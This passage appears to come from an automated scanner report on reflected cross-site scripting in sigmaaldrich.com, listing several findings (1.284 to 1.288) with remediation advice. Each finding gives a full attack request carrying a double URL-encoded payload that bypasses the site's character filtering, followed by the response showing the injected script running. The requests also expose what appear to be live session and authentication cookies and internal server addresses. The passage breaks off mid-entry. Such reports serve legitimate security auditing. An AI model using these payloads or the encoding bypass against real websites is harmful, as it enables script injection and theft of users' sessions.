The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure/ba5ea%2522%253balert%25281%2529%252f%252f39be17f4157/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:44 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure/ba5ea";alert(1)//39be17f4157/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.284. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12cd0%2522%253balert%25281%2529%252f%252f3d9dad51fca was submitted in the REST URL parameter 1. This input was echoed as 12cd0";alert(1)//3d9dad51fca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc12cd0%2522%253balert%25281%2529%252f%252f3d9dad51fca/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:57 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc12cd0";alert(1)//3d9dad51fca/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.285. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f759%2522%253balert%25281%2529%252f%252f8ff37a78655 was submitted in the REST URL parameter 2. This input was echoed as 1f759";alert(1)//8ff37a78655 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib1f759%2522%253balert%25281%2529%252f%252f8ff37a78655/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:06 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib1f759";alert(1)//8ff37a78655/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.286. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55a88%2522%253balert%25281%2529%252f%252fb19bddf449c was submitted in the REST URL parameter 3. This input was echoed as 55a88";alert(1)//b19bddf449c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs55a88%2522%253balert%25281%2529%252f%252fb19bddf449c/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:11 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs55a88";alert(1)//b19bddf449c/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.287. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a08ef%2522%253balert%25281%2529%252f%252f320de9424a0 was submitted in the REST URL parameter 4. This input was echoed as a08ef";alert(1)//320de9424a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Flukaa08ef%2522%253balert%25281%2529%252f%252f320de9424a0/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:17 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Flukaa08ef";alert(1)//320de9424a0/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.288. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edcd5%2522%253balert%25281%2529%252f%252f3c310134b3c was submitted in the REST URL parameter 5. This input was echoed as edcd5";alert(1)//3c310134b3c in the application's response.

